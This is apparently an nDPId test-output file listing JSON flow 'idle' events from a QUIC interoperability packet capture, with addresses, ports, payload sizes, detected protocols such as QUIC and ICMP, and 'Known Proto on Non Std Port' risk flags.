-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434587,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434523,"flow_last_seen":1603816434855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00851{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00868{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 